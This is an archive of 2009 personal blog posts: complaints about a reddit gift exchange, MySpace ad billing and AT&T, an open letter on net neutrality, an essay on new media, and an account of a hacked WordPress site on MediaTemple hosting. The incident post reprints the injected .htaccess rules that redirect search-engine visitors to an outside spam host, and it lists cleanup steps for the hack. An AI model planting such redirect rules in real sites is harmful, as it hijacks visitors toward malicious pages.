Kyle Brady: Blog » Expose

Why Not To Participate In Online Gift Exchanges [Expose]

Kyle Brady — Sun, 13 Dec 2009 20:43:40 +0000

A few weeks ago, I came across a project for reddit members called redditgifts, essentially a secret Santa project, that I thought would be fun – so I joined in, ready for what I would assume would be entertaining. But I was wrong.

I received bpsoka as my secret Santee, and his present qualifications said “no bobcats”, which I automatically assumed was a poke at me to see what I’d do – these are redditors, after all. I decided to send him a response to his prodding, and put together an evil bobcat Santa picture that I signed, dated, and gave my username on, pretending that it was classy enough to be framed. Then I put it, along with some red and green paperclips, into the envelope and sent it away.

His reaction has been explosive and childish – not only did he fail to see the connection between the picture and what he had told me via his present description, but when he complained about it the only detail he mentioned was the four paperclips. After other members began lamenting this with him, I was contacted by kickme444, the organizer of the project, who badgered me via IM (loudenwain on AIM) for being a horrible person, apparently ruining someone’s lonely Christmas, and saying that I should send another present - one repeated claim was that the gift was supposed to be $15 in value, which was only a suggestion, not a requirement. Even though I explained the situation clearly to him multiple times, he didn’t care and started telling me I was being “offensive” when I started to get angry with his obstinate ignorance. I told him I’d send another one, and to leave me alone.

But I had a busy week last week, and didn’t have a chance until yesterday (12/12/2009) to look through all the comments on the redditgifts page, and really think about this. After some thought and investigation, I decided I wasn’t sending another gift – Christmas is not an “I’m upset, send me another!” time, and since this was a joke present in response to his own actions, it’s not my fault he didn’t understand or appreciate it. I posted this on the redditgifts thread, identifying myself, and messaged kickme444 and bspoka to let them know what was going on, trying to be even-toned, rational, and mature about this.

It appears, however, that no-one else is interested in behaving properly.

Since then, kickme444 has taken to harassing me via reddit messages (which would ruin his image if I posted them publicly), I was banned from the subreddit (despite never participating or intending to), and people have begun responding to my posting on the gift’s complaint page. Even more curious is that all of my recent submissions and comments are being massively downvoted by people who apparently sympathize with the whiny individual I sent a gift to – this started last night a few hours after identifying myself, and is continuing as of writing this. And not once have I been contacted by bspoka himself.

What began as something fun has now turned into a demonic circus where I’m being persecuted for being exactly what a redditor is – someone who appreciates humor and stands by their principles. If I would have received a present like I sent, after making comments like “no bobcats”, I would have laughed for days. To the even greater fury of the masses, I refuse to bow to the demands for another present because that is not the spirit of the event, and since my gift was not intended to be malicious or disappointing, I do not take responsibility for his reaction.

reddit is occasionally a vicious place, but this reaction is ridiculous – I identified myself to help smooth over the situation and explain what was really going on, and have instead become a target for some overzealous Christian Crusaders. This whole situation has been one failing after another, beginning with kickme444’s intervention and reaction to the situation, and has only gotten worse.

As I told kickme444, I will not be participating again – I have better things to do than deal with drama queen children.

--- --- ---

Update (12/13/2009 1:40pm PST): a thread has been started by wildeye for the singular purpose of mobilizing a groupthink against me and bragging about their malicious actions - no surprise there.

Update (12/13/2009 6:30pm PST): to all the self-righteous - the continued heckling via email, reddit messages, and comment threads, not to mention massive coordinated downvoting of everything of mine on reddit, is not going to change anything. Your actions, along with the initial one from bspoka, have long since convinced me that even if I should have sent another gift, I won't be - you don't reward a dog with rabies for biting you.

Update (12/13/2009 6:40pm PST): I just got a message from user xerograde that shows the duality of this angry mob:

Hey man, You are probably getting swarmed with stupid mail right now, but I gotta say this was blown way outta proportion. I think the stupidest thing is that I got trolled with a cow poster; I showed some disappointment and reddit got angry that I didn't appreciate it its 'uniqueness.' Meanwhile your secret santee gets trolled with paper clips/bobcat pic and reddit asks for you head. I guess you just can't win man.

Update (12/13/2009 7:35pm PST): kickme444 helpfully unbanned me, and I made a last-ditch request for sanity to return.

Update (12/13/2009 9:35pm PST): my attempt at reason failed in less than two hours, and I'm now have negative comment karma thanks to all the downvoting of everything related to me - I was at 200-something for comments before this all started.

Update (12/20/2009 9:45am EST): After a week of laying low and not commenting on any of the drama, my account was still being attacked. No matter where I went to comment on items (I tried a few), there were people that stalked my account and downvoted everything - some even chose to harass me publicly while doing so. I've since deleted the account and created a new one that I will be using from now - named publicly at a later date after people forget about this.

--- --- ---

Documentation

IM Chat Sample with kickme44:

loudenwain: well look. There were rules printed that so far, 900 people read and understood
loudenwain: the average price per gift has been just over $30
loudenwain: and your gift came in at 75 cents

...

loudenwain: you are arguing with me
AIM: and if people are going above and beyond, i'm not responsible with that
AIM: *for
AIM: i'm not arguing with you, but i'm telling you that it's not my fault
AIM: i'll play into his hurt little fantasy
AIM: but not because i agree
loudenwain: hrm, you do actually sound a bit like a troll.
loudenwain: did you read the rules?

...

loudenwain: you are really offending me. do you know that i am not getting paid for any of this?
loudenwain: you obviously do not understand the spirit of this project

Message to kickme444, bspoka, and the public:

Dear everyone,

I'm his secret santa. kickme444 contacted me last week and misinterpreted the entire situation, even after explaining twice, and attempted to shame me into sending another present - he even called me "offensive" when I started getting pissed off at his approach to the situation.

But I've had time to think about this, and I'm not sending anything else.

The full explanation can be found in the message I just sent to kickme444:

So I've had a crazy week with the semester ending, and I've finally had time to think about "the situation", including reading through the gift received page properly.

And I've decided I'm not doing anything, despite your attempts to shame me into doing so.

Like other users have said, without my prompting, this was intended as a joke - paperclips, evil bobcat santa, and whatever else it was that I put in. If he wants to whine about it, that's fine, but I see no need to make a second effort because he demands it.

Despite his reaction, he prompted this by saying "no bobcats" in his description section of the gift. Naturally, I assumed he was prodding me, and since he's a redditor, I figured he could appreciate a good, random joke.

As to not knowing who I am, I'm not sure how that's possible... I signed and dated the bobcat santa picture (as if he could frame it) and included my reddit username on there, as well as my full name. I could have easily been found rather than him making a big deal out of this and choosing to smear someone he didn't bother to contact properly for the sympathy of random strangers.

If I received something as random as this, especially after prodding them, I would have laughed very, very hard. Apparently he not only didn't get the fact that it was a joke, but doesn't understand the point of gift giving - you don't make demands, and you get what you get.

Sometimes it's a joke present you don't entirely understand, and you have to live with it. This is one of those times.

--Kyle

MediaTemple’s Continued Inadequacy Issues [Expose]

Kyle Brady — Thu, 26 Nov 2009 23:36:02 +0000

[note: substantial and important updates available]

Almost a month ago, I made MediaTemple, and the world, aware of an attack that seemed to be a large security issue, and they eventually admitted it was their problem to deal with, rather than blaming it on software like hosting companies like to do. But, weeks later, the problem is not yet resolved, and the public is largely still in the dark.

In the last week, I’ve been notified twice to change my FTP/SSH passwords, and the request yesterday came with an odd statement: the passwords had been previously stored as plaintext, rather than being encrypted or hashed, and that the attackers somehow had access to this - this was MediaTemple’s sole explanation of the massive security issue.

Entirely unacceptable.

After initially making this issue public, both here and at the Inquisitr, I received a phone call from Andrew Won (VP of Customer Service) and Chris, whose position I can’t remember, on 11/16/2009 saying that they discovered the issue, had patched the necessary software, and had submitted patches to the software’s vendors – but asked me to not say anything because of the “security process”. They didn’t give me enough details as to what was actually happening for me to matter, but I kept quiet.

The traffic on my blog, and the comments, continued to mount in the days that followed and it became clear that the issue had not been resolved – people were still being hit with this hack/attack. On 11/19/2009 I asked for an update from Andrew and received a reply stating:

Unfortunately, we still don't have anything public yet. We have already resolved all of the issues and this issue will not recur.

Well, as the attacks continued for other people’s accounts, even through today (11/26/2009), it’s obvious that they had not resolved the issue. When I irately called late last night (11/26/2009 early morning PST), the tech had no answers and neither did his supervisor – in fact, I knew more about the situation than they did, and I was given the partyline: “our engineers are aware of the issue and working to address it.” Further conversation with Andrew, via email, resulted in nothing but doublespeak and sidestepping my questions.

It’s obvious, at this point, that they are either incompetent or lazy – I’m not sure which. They were slow to respond to this in the first place, and have made one misstep after another, which isn’t giving the affected customers much faith in their hosting company, let alone those unaffected that hear the horror stories. The fact that passwords were stored in such an insecure way might be part of the issue, but there are larger problems: discovery, point of entry, depth of access, and execution – none of which (mt) is, in any way, addressing.

When I mentioned this to Andrew, he responded by effectively saying they still have no idea what the problem is or how to fix it:

We are still in the process of investigating this. Unfortunately, while we have a lot of theories and assumptions, we still do not have anything definitive. So please bear with us while we investigate this. We are taking all precautionary measures and locking down many external and internal systems. We will continue to closely monitor our systems and take appropriate actions.

And they even want to dispute the fact that it’s been almost a month, while downplaying the large number of customers affected:

It was not a matter of resolving over the period of 3 weeks. It was a matter of continuing to take steps, monitor and then take further steps. The number of sites actually affected is very small, but due to recent events, we decided that we needed to take a more blanket security approach and change all (gs) Grid Service Server Admin passwords as a precautionary measure.

The “security protocol”, mentioned above, is essentially a “don’t talk about it until it’s fixed” process, but it assumes that those involved are actually trying to fix it, and (mt) is using this as both a crutch and deflector shield – in addition to assuming unaware customers are happier than aware ones:

Chris and I advised you of security protocol, which is what we were following. And security protocol states that you do not publish public info until you are absolutely certain that the issue is resolved and that you are reasonably certain that the attacks or hacks have stopped.

We didn't have much choice in this matter. As we explained to you before, security is a very sensitive issue and by making information public, you are also feeding information to your attackers. We also alerted all affected sites and accounts of the issue and informed them of the steps that we have taken at the moment and time. This issue was still evolving when we last spoke.

Finally, when asked about compensation to customers for their utter failure as a semi-secure hosting company, which they haven’t actually fixed yet, Andrew once again sidesteps the issue by choosing to blame the users/customers instead of themselves:

We do encrypt passwords, but there was a separate file that was kept for the purpose of allowing customers to view their FTP and mySQL passwords through their Account Center. This was a feature many customers asked for in the past. However, we have decided that this feature comes at a price and we are no longer willing to take that risk. Yes, we have learned our lesson. We definitely do understand that this was a headache for ours customers, it was a huge one for us, so we can only imagine it was a much bigger for our customers. We will make sure to discuss a concession of some sort for those customers that were actually affected by this issue.

In summary:

these attacks are the result of MediaTemple’s failure as a hosting company

they chose to wait three weeks to even address the issue publicly

they claimed to have solved the issue long ago, when they hadn’t

they still haven’t solved the security issue, three-or-more weeks on

they continue to not reveal any details to users, while sidestepping most questions

they seem to have no idea of what is truly occurring

They’re going to lose alot of customers over this, especially since they are known for having large-scale problems on a regular basis.

--- --- ---

Update (11/26/2009 5:30pm PST): I had a lengthy phone conversation with Andrew, and while I can't comment on the details, I feel more confident in MediaTemple's abilities and in what they're doing to solve this large security issue. More concrete details as they come, but I would suggest that we have more patience with (mt) on this.

Update (11/30/2009 4:35pm PST): MediaTemple is slowly opening up about this, although the full story doesn't seem to be public yet. Details as/if they come.

A List of Reasons Why Google Isn’t Evil [Expose]

Kyle Brady — Mon, 16 Nov 2009 08:10:41 +0000

There's been alot of talk recently about Google "being evil", because they have their hands in so many product arenas and have access to substantial amounts of user data, so it's time that someone pointed out why Google isn't "evil" or even becoming so.

First, look at it from Google’s perspective:

their main interest is indexing the largest amount of content possible, and doing it fast so the content’s relevant

the majority of the modern internet, everything from server to browser to protocols, is at least ten years old at the core

Google’s results are only as good as their relevance and are sorted properly, so they have a vested interest in attempting to do so

Now, look at their behaviors:

“Webmaster Tools” was arguably the first attempt by Google to make things faster/better on their own, by allowing webmasters to help Google better access sites

Chrome takes marketshare away from Internet Explorer, which is beneficial to all mankind

Javascript engine developments, like those found in Chrome, are a good thing – especially when they’re spread back to the community. JS is notoriously slow in some browsers, and even in the fastest of them can still be sluggish

the HTML standards have been bogged down in meetings for years, and have achieved next to nothing – so Google’s begun pushing things like , rather than wait for the W3C, who could take many more years to produce the same results

Google has contributed highly to languages like Python, PHP, and MySQL because of their intense usage of them – creating a language entirely is only a half step away from helping optimize pre-existing languages

wanting to augment the HTTP protocol, and presumably make it backwards compatible, is a good goal: HTTP is pretty slow at times, especially over things like 3G wireless networks. If it can be expanded to do more, or do things better, this benefits everyone

In case this isn’t easily pieced all together, here’s the gist: Google may be doing lots of things out of semi-self-interest, but people need to remember that they’re not only doing these things in the open, they’re licensing many (most? all?) of these projects so that Google isn't in total control. A new language that could be used to rewrite/replace Apache, in combination with a new web protocol, may seem dubious, but once you consider their licensing it's not.

The comparison to Microsoft and other “monopolies” is easy to refute: Microsoft participated in similar activities (IE, ActiveX, VB.Net, Windows Server, etc.), but did so either behind closed doors or with strict, proprietary licensing. The fact that Google’s opening the door to Go in the same manner that PHP or Python does is an extremely crucial differentiation, and they’re very careful about doing this for all of their potentially gamechanging structure inventions.

Now if Google were to do all of this but not distribute source code, or sue a bunch of people for using it in a way they didn’t expect or don’t appreciate, that would be entirely different. But they’re not, and they’re not likely to either – even if they don’t have control over creations like Go, they’ll be happy to see it used because, in the end, it benefits them too.

Most of Google's products can't be forced on people – they have to choose to use them, something that Microsoft’s products have never really needed, or chosen, to do.

[inspired by Rob Diana]

Wordpress, MediaTemple, and an Injection Attack [Expose]

Kyle Brady — Sun, 08 Nov 2009 00:04:45 +0000

[note: this is a MediaTemple issue, not a Wordpress one, and more details have been made available on a new post. updates will follow there - this page serves as a good primer, but better "why?" answers can be found there]

Sometime in the last week, my “kyle-brady.com” account with MediaTemple was compromised via a Wordpress 2.8.5 exploit, and it caused havoc for a few days – I finally noticed it on the evening of 11/6/2009, and it was finally resolved in the afternoon of 11/7/2009.

Here’s what happened:

an IP address from Texas submitted a POST request to Wordpress that somehow uploaded a file, which extracted itself and injected a piece of Javascript eval() code to execute after the tag

a list of hundreds of URLs to assorted pages, mostly porn, appeared after the tag on all pages of the site

for content created after the attack, it somehow embedded itself inside the Wordpress content, and all links redirected to a malware site – in addition to breaking the entire page

Here’s how to fix it:

remove the eval() code from “index.php” in the root Wordpress directory

delete and recreate, through the Wordpress panel (NOT directly in the database), all infected posts

delete the .nfs* file in the root Wordpress directory

if you’re really paranoid, replace all the Wordpress files with clean source

open the root .htaccess file and remove this code

I originally thought that someone may have gained access to Wordpress, or the server itself, and modified some themes files or something Apache-level, but this obviously wasn’t the case. MediaTemple was essential in discovering both the problem and solution, even though it’s outside the realm of hosting – they’re the ones that discovered an IP in Texas made a POST request to upload a file, and they discovered exactly what was going on.

If MediaTemple had refused to help me, it would have been much more difficult to figure all of this out, since I’m not familiar enough with servers to easily run log searches, or other tools necessary for this sleuthing. But they didn’t, and one of the Support Technicians (Mike M.) actually spent a few hours in the middle of the night poking around for me, and called me at 4:30am PST with a definitive solution.

Wordpress Security has already been contacted about this issue, to hopefully help others avoid this issue in the future. Many thanks to MediaTemple, especially Mike M. and Chris K., for the unexpectedly awesome assistance.

--- --- ---

Update (11/8/2009 10:25pm PST): Thanks to Dan's discovery, the .htaccess editing has been included in the removal steps.

Update (11/12/2009 9:50pm PST): Evidence is mounting (in the comments below, the Wordpress bug ticket, and elsewhere) that while this may be a Wordpress exploit, it is appearing on other non-WP CMS installations, and may have a server-configuration component to it. Details to come.

Update (11/15/2009 1:30pm PST): MediaTemple has been ignoring me for the last few days on this issue, and I've just been hit by the same attack in the last few hours - this time on Wordpress 2.8.6, the security release that was supposed to fix this.

Update (11/15/2009 2:10pm PST): I've decided to escalate this, and wrote about it at the Inquisitr.

Update (11/16/2009 12:30pm PST): I got a length, personal email from MediaTemple yesterday, and a long phone call today about this issue - I can't say alot right now, but MediaTemple is taking ownership of this problem, and is working on it. Details to come soon.

Update (11/26/2009 1:30pm PST): The issue is still ongoing, and while I had been told it was solved a week ago, that is apparently not the case. I'm pushing for details, and will update soon. This situation is entirely unacceptable.

Update (11/16/2009 2:05pm PST): MediaTemple has released a sorry excuse for explaining what happened... but this is insufficient information and not the full story.

Update (11/16/2009 3:45pm PST): New post with more details on the inability to resolve this issue and their unwillingness to discuss it. Future details will be posted there, rather than here.

--- --- ---

More details:

Uploaded File

named “.nfs*” in the root Wordpress directory

/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/

/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>

Javascript Eval Code

found in “index.php” in the root Wordpress directory

Example Link

found after the tag on all pages, list of hundreds of similar URLs

blow dryer tattoo

.htaccess Code

found in the root ".htaccess file"

RewriteEngine On

RewriteOptions inherit

RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]

RewriteRule .* http://you-search.in/in.cgi?4¶meter=sf [R,L]

An Open Letter to Senator Diane Feinstein [Expose]

Kyle Brady — Fri, 30 Oct 2009 14:17:23 +0000

I recently participated in a petition website that sent out letters to the Congressmen for our individual states on the issue of Net Neutrality and its importance – I’d like to it if I remembered what site it was. One of the Senators that received the letter from my California location was Senator Diane Feinstein (D-CA), who sent me an unexpected email reply, albeit a form letter.

I don’t have a problem that she sent me a form letter, and am actually glad she acknowledged my existence – my problem is in what, exactly, she said and what that means. To that end, the following is an Open Letter to Senator Diane Feinstein…

Dear Senator Diane Feinstein,

Thank you for recognizing my existence, even if it was via a form letter – it makes me feel as if I can, as a citizen, have an effect on our modern political battlefield in the age of corporate interests and corrupt legislators.

I do, however, have a problem with your response: within the same breath, you claim to support the principles of Net Neutrality, but immediately question the need for regulation and indicate that the interests of ISPs are potentially more important than those of their customers, which just happen to be the entire population of America.

Internet Service Providers, on the whole, have long since proved they have no interest in the privacy or equal treatment of their customers, with behaviors that run the gamut from traffic filtering/shaping/blocking to warrantless wiretapping. Other utilities companies in America, whether they are private, public, or a coalition project with the government, are heavily regulated and carefully monitored so as to not disrupt the daily activities of the country – in the age of the Internet, connectivity, and an increasing dependence on all things digital, why is Internet access treated any differently than electricity, water, waste management, or various other services?

You see, Internet access has become the next modern utility service. It has crept up on the country and taken both the people and the legislature by surprise, but it has arrived at this status nonetheless. Would it be acceptable for a power company, such as PG&E, to cut off power to homes that it felt weren’t using its electricity properly, or in a manner they ethically approve of? Would it be acceptable to selectively provide water to households that only use their product in amounts less than an arbitrary and unreasonable threshold on a daily basis? Or perhaps local trash pickups should only occur when the waste management company feels that your trash has appropriate ratios of paper, plastic, and biodegradable?

The answer, quite obviously, is a resounding ‘no’.

America was founded on the principles of individual rights and freedoms, and has since grown substantially to support and enhance these initial values, but it is time to take another large step in the process of liberty: a Digital Rights and Freedoms Act must be had for the American people, lest the nation devolve into unrepentant digital battles for civil liberties.

The national bandwidth has yet to approach capacity, despite what network providers will tell you, and there is much more ‘dark fibre’ to be found and used, left over from the dot-com boom, for further capacity. The problem is that for ISPs to provide the bandwidth and speeds that they advertise to their customers, essentially anything labeled as 'broadband', they would have to distribute customers more intelligently and appropriately across networks, rather than continue their current habit of overloading – this means less profits, because of the associated network costs. To accomplish this process of overloading, they employ tactics of filtering, shaping, and blocking traffic, often citing bogus claims of “network overload” or “unacceptable traffic”.

Finally, an underlying issue that will undoubtedly arise is that of copyright – the MPAA and RIAA would love for nothing more than certain types of traffic, usually classified as Peer-to-Peer, to be blocked from all networks. The honest truth, however, is that these protocols are copyright-independent, and are often used for entirely legal purposes. Yet the ISPs use these claims to shut off customers’ access, or heavily filter it, because of the occurrence of a supposedly illegal activity. Deciding whether a P2P traffic stream is legal is severely work intensive, and not something that can be accomplished by a piece of software – traffic source (such as The Pirate Bay) is not related to its legality, filetype (such as MP3) is independent of copyright, and original source (such as Shakespeare or Nine Inch Nails) is often, and rightly, ambiguous.

The point that I’m trying to make, and that you hopefully understand, is this: Net Neutrality is neither optional nor negotiable. As an AT&T customer by default, I have experienced heavy traffic filtering and corporate lies for the last three years, and I can personally tell you that it occurs when I am doing nothing even approaching illegal, yet it interferes with my productivity and workflow. If America, as a nation, is expecting to be a competitive and connected force on the global scale in the coming years, then federal legislation must be passed in order to secure the Digital Rights and Freedoms of the American people.

A lesson learned from the last two years of banking and investment institutions’ abhorrent behaviors should be that markets absolutely will not regulate themselves in a manner aligned with proper ethics, or the betterment of their customers, when there are higher profits to be had. Comcast and AT&T are both tangible examples of ever-higher prices for ever-degrading service, and such a trend will likely only continue – it is up to Congress, along with the FCC, to ensure that it definitively does not.

The battle for Net Neutrality in America is no different than any of the prior battles for Civil Liberties, as it is about the ability of all citizens to work and live in a manner that they are fundamentally entitled to. Anything short of a complete and uncompromising suite of regulations to place what has been previously unwritten into explicit law will be perceived by a large subset of the country as a failure of Congress to both understand the fundamental issue and act on behalf of the people.

Do not let corporate interests, or the Congressmen they control, sway your opinions or influence your decision.

Sincerely,

Kyle Brady

Correspondence

From: Senator Diane Feinstein

To: Me

Date: 10/29/2009

Dear Mr. Brady:

Thank you for writing to me about open access to the Internet and network neutrality. I appreciate hearing from you.

I agree with the general principles of network neutrality that owners of the networks that provide access to the Internet should not control how consumers lawfully use that network and should not be able to discriminate against content provider access to that network.

As Congress debates changes to our telecommunications laws this year, many different proposals have been offered regarding network neutrality. The question arises whether or not action is needed to ensure unfettered access to the Internet. I believe any workable solution must balance the needs of the network, service and information providers. Please know that when legislation regarding network neutrality comes before the Senate I will be sure to keep your specific views in mind.

Again, thank you for writing. If you should have any comments or questions, I hope you will feel free to contact my Washington, DC staff at (202) 224-3841.

How MySpace Advertising Steals Your Ad Money [Expose]

Kyle Brady — Fri, 16 Oct 2009 23:43:33 +0000

On the surface, advertising on MySpace would seem like a relatively basic and fruitful enterprise: create a 728x90 banner, setup the ad, get seen by millions of users, and reap the rewards – there’s no weird custom ad decisions to make, like with Facebook. MySpace even makes it easy by using a single form to setup CPM vs. CPC, ad rates, daily/lifetime budgets, and all the other details.

However, they like to steal your money.

When I was setting up an ad for my company’s graphic design services that cater to artists/bands, I discovered the first stick in the mud: there’s a minimum daily rate, no matter what. We wanted to spend $100.00 stretched out over two months, letting the advertising system figure out when to display it, and this would not have been a problem with Google AdWords, but it’s MySpace, so you have to deal with their crap. After some tweaking, I found that they wanted a $5.00/day minimum, which would only net us 20 days – not quite the exposure we wanted. Deciding that spending a little more for longer exposure was acceptable, I setup $5.00/day for 25 days. It came back with an error message, giving complaining about the daily budget, so I clicked on “Lifetime Budget” and set it to $125.00, assuming that it would distribute the $125.00 over the 25 day campaign period.

Save. Billing. Confirm. Activate. Emails came saying it was pending, then approved, and finally active.

Imagine my surprise when I wake up to an email early the next morning saying that our account had been charged $100.35 for less than a day of activity. But instead of questioning it, I naively assumed that they were precharging our account for some reason, and let it go. Fast forward another day, and an email comes saying we’ve been charged $53.65 – now I’m pissed. I pause the campaign, fire off an email to Ad Support, and investigate on my own.

When I viewed the campaign’s settings… surprise! We had a $125.00/day budget, despite what my initial settings which were twice verified after activating the campaign. And there’s another $15.00 that they want me to pay for activity not-yet-billed, since the campaign’s been paused.

It took a few hours, but I received a vanilla response that treated me like a halfway literate child, stating the obvious: the daily budget was set to $125.00/day, and we were being charged according to our ad behaviors and settings. Naturally, I was even more pissed, and responded to let them know that I believed it was a technical error or glitch and that we wanted a refund.

Well, if you’ve ever dealt with a company’s billing or sales department before, you should recognize their response: it wasn’t a technical error, it was my fault, and they won’t give us a refund, but they’ll give us a $50.00 campaign credit. My reply was less than friendly, because, at this point, I feel like I’m dealing with mob bosses, and demand a larger campaign credit. This time they take a full 16 hours to respond, only to say that $50.00 was all they can offer, and then attempt to end the conversation. There has been no credit to the account.

For a small company with a very small advertising budget, these events are detrimental – we decided, for the first time, to advertise our services in a grand fashion, and MySpace spent more money than we had ever intended… in the first two days. A total of $169.00 has been billed to us by MySpace Advertising - $44.00 more than what we had set as a Lifetime Budget. And it’s been wasted over a brief <48 hours exposure that netted zero results.

Even with a $50 credit, which is only a few days’ worth of advertising, we’ve lost $119.00 to corporate theft and customer support evasion. No more advertising for us.

Thanks, MySpace. You’ve been an entertaining asshole for the last few days – would you like my lunch money? Or maybe the keys to my car? Actually, I don’t even need my girlfriend, so why don’t you go out with her?

I hope you die in a fire.

--- --- ---

Update (10/18/2009 4:20pm PST): I've been working with Steve Wilcox, MySpace's Marketing Director, since within an hour of posting this on Friday, and we've reached a solution after a few rounds of phone- and email-tag.

We received a full apology and a credit for the full amount charged, in addition to receiving a "good faith credit" for the amount we wanted to spend on advertising in the first place. The end result is that our advertising budget has now essentially doubled, and we're going to give it another try - hopefully with better results.

As of right now, we're very happy with the way this has been handled, as well as the outcome.

--- --- ---

Correspondence

From: Me

To: MySpace Advertising

Date: 10/15/2009

We set up the campaign very carefully to be $5/day, lifetime budget of $125 for 25 days.

How did this get changed to $125/day?

We've now been charged, in two days, more than we had ever intended to spend. Not only is this illegal, it's outrageous, since I have emails showing the setup of our campaign as such.

Please refund our money and fix this ASAP.

From: MySpace Advertising

To: Me

Date: 10/15/2009 12:20pm PST

Hello,

Whenever you create a new campaign, you will be asked to set a daily or lifetime spending limit for your campaign. You cannot have both a daily & lifetime budget at the same time. It's either a daily budget or a lifetime budget.

When the campaign was created it was setup with a Daily Budget of $125.00 which is why your campaign spent $125 in 1 day.

If your goal is to only spend $5 per day then you want to create a Daily budget of $5.

If your goal is to only spend $125 throughout the entire campaign then you want to create a Lifetime budget of $125.

Thank you for contacting MySpace MyAds.

Thank you,
MySpace.com

From: Me

To: MySpace Advertising

Date: 10/15/2009 2:10pm PST

It most certainly was not. I selected "Lifetime Budget", and input $125.00.

Your code-level error is not my responsibility, and I demand a refund, or at least gratis advertising for the remainder and parameters of what should have been our campaign.

From: MySpace Advertising

To: Me

Date: 10/15/2009 3:23pm PST

Our records show this was not a technical error. When creating the campaign you choose a daily budget of $125 instead of a lifetime budget.

MySpace MyAds is a Self Service platform and you are responsible for managing your campaigns.

We can offer you’re a $50 credit towards your campaigns however MySpace will not refund the $125 charge.

Thank you for contacting MySpace MyAds

From: Me

To: MySpace Advertising

Date: 10/15/2009 3:39pm PST

It was an error. You're honestly going to tell a customer of yours, one that just unexpectedly paid you over a hundred dollars, that they're wrong?

Do you really think I'd be bringing this issue up if I wasn't surprised at the situation results? And, given the nature of the company and what we do, do you really think I'm technically incompetent enough to have made such a dumb human error? The answer is no.

A $50 credit is a good start, but $100 would be more palatable, given how that is approximately how much we spent on the first day of our campaign, rather than almost the entire 25 day set.

From: MySpace Advertising

To: Me

Date: 10/16/2009 9:53am PST

Unfortunately a $50 credit is all we can offer.

Thank you for contacting MySpace MyAds.

From: Me

To: MySpace Advertising

Date: 10/16/2009 2:40pm PST

And where is this credit?

You guys fail once again.

The Insulting Attack on New Media [Expose]

Kyle Brady — Fri, 09 Oct 2009 07:05:24 +0000

New Media has been in the process of awakening for approximately a decade, existing as a term that refers to bloggers, vloggers, podcasters, and others that produce material with an eye towards journalism. The death of Old Media, at the hands of its newer brethren, has been predicted since the beginning, with many hoping that the new digital forums would replace the large institutions that have grown over the last century.

It should come as no surprise then that as Old Media has stumbled and begun to fall, New Media has come under attack from those on their way down. Despite the animosity and vicious hatred prevalent within their group, there remains a few bastions of intelligence, serious journalism, and integrity – organizations such as NPR, the BBC, PBS, APM, and more have given hope to those that have despaired over news organizations' chosen interest in ratings and entertainment over truly informing or educating their audience.

Attacking New Media is not a new activity – the sneers and jeers started almost as soon as the ancestors of the modern tools appeared. The common thread among the complaints from so-called legitimate journalists include information verification methods, author credentials, "echo chamber" behaviors, hidden agendas, bias, and a litany of other issues related to ethics and professionalism, but it’s important to note that these very problems known to exist within portions New Media are in no way limited to blogging or podcasts – newspapers, “legitimate” journalists, and news stations have all fallen prey to the same symptoms that they’re complaining about, and not necessarily recently. As the financing of what used to be journalism dwindles, those still in Old Media have been forced to move faster and outside their realm of experience and knowledge, resulting in press release regurgitation, questionable data, and the parading of entertainment as news.

Many of these Old Media organizations have embraced the methodologies of New Media to garner new audiences, and have achieved great success in some cases, such as NPR. But regardless of their delivery mechanisms or digital behaviors, their greater budget, name recognition, and other epicurean characteristics does not give Old Media a licensed pulpit from which to preach – they should have to continually earn the trust and respect of their audience, the same as anyone else. This is something they truly do not believe.

The BBC recently revealed, in a very public manner, the bias Old Media holds against its newer rivals that has been known for years by those in New Media, but has largely been decried. Through a two-part documentary series investigating “citizen journalism” [Part 1] [Part 2], Michael Buerk leads a disgustingly insulting parade intended to smear his internet-based counterparts, using the recent Iran election protests as a focal point. Through a series of loaded questions, interview interruptions, and a other underhanded, classic propaganda techniques, Buerk manages to appear unbiased to those that don’t truly understand the breadth and scope of the situation. An unaware listener would, after listening to this "investigative" series, assume that New Media is less reliable, factual, and valuable than Old Media outlets such as the BBC - which, of course, is patently untrue. Ironically, both the BBC and Buerk declined to comment, by ignoring any the request itself.

No-one is contesting that New Media varies in quality depending on the source and topic – but this is no different than Old Media. The Washington Post, CNN, FOX “News”, the Associated Press, and numerous others have well-known public biases that taint the very issues they should be nakedly communicating to their audience. NPR is well known for being extraordinarily unbiased, and yet they are one of the least popular news organizations within America, with FOX “News” leading the cable news network charge into intellectual illiteracy.

At worst, New Media is no less reliable for factual news than Glenn Beck or Rush Limbaugh, where raving lunatics find a public soapbox to brainwash willing and overeager masses. However, the beauty is in the brilliance that can be found in New Media: TechDirt examines old-world paradigms of copyright and intellectual property, DailyKos exposes lies and deceit within politics of any American party, the Inquisitr serves as an infotainment clearinghouse, Gawker is known for publicizing scandals of public figures, and the list goes on, almost endlessly, for every niche or audience imaginable. These examples are organizations based on the textual blogging format, but audio, video, and short-form text New Media institutions exist, and may in fact represent large swaths of information delivery’s future.

It is high time for Old Media to stop complaining about their demise, while behaving in a two-faced unethical manner, and embrace the digital future that is so obviously coming. Journalism and the dissemination of pure news are essential to the democratic lifestyle, so the process must continue. However, it is insulting to insinuate that intelligent people who invest substantial time and effort in producing valuable media-oriented products are somehow of lesser worth and importance than someone who spent four years partying and barely passing classes at an unknown college to achieve the golden ticket that is a Bachelors of Arts in Journalism.

AT&T’s Local Monopoly Continues Unabated [Expose]

Kyle Brady — Tue, 22 Sep 2009 07:05:54 +0000

I’ve already written extensively about how bad AT&T’s Internet Service is (background: [1] [2], offsite: [1] [2]), but new developments have prompted me to add to the already-epic saga…

After the blocking of 4chan by AT&T earlier this summer and their continued filtering/throttling of my traffic, I decided it was time to find a new ISP. I’d had Comcast before and left for reasons of ethics and principle, and I wasn’t going back. Verizon and other major providers are not available in the South Bay area for some reason – so I went hunting for local providers that probably wouldn’t have the legal departments necessary for the corporate doublespeak of filtering/throttling customers.

